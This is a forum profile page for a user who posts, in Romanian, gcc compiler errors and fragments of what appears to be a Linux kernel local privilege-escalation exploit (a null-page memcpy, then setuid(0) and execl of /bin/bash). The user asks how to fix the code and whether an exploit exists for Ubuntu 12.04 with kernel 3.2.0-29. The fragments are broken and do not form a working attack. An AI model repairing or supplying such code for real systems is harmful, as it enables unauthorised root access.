Jump to content

acidlsd

Members
  • Posts

    3
  • Joined

  • Last visited

About acidlsd

  • Birthday 02/01/1986

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

acidlsd's Achievements

Newbie

Newbie (1/14)

10

Reputation

  1. an.c: In function 'main': an.c:60:19: error: invalid operands to binary << (have 'void *' and 'int')
  2. gcc -o2 asd.c asd.c: In function 'main': asd.c:59:3: warning: passing argument 1 of 'memcpy' makes pointer from integer without a cast [enabled by default] /usr/include/string.h:44:14: note: expected 'void * __restrict__' but argument is of type 'int' asd.c:63:3: warning: missing sentinel in function call [-Wformat] memcpy(1<<12, &patch_current, 1024); for (i = 0; i < (1<<17); i++) ((void**)(1<<12)) = &patch_current; send(f, n, sizeof(n), 0); setuid(0); return execl("/bin/bash", "-sh", 0); asta e codul.. nu stiu ce trebuie sa modific.. daca cineva poate sa ma ajute..
  3. 3.2.0-29-generic #46-Ubuntu SMP Fri Jul 27 17:03:23 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux Ubuntu 12.04.2 LTS \n \l stie cineva daca a aparut exploitul pentru aceasta versiune? am incercat cateva si nici un rezultat
×
×
  • Create New...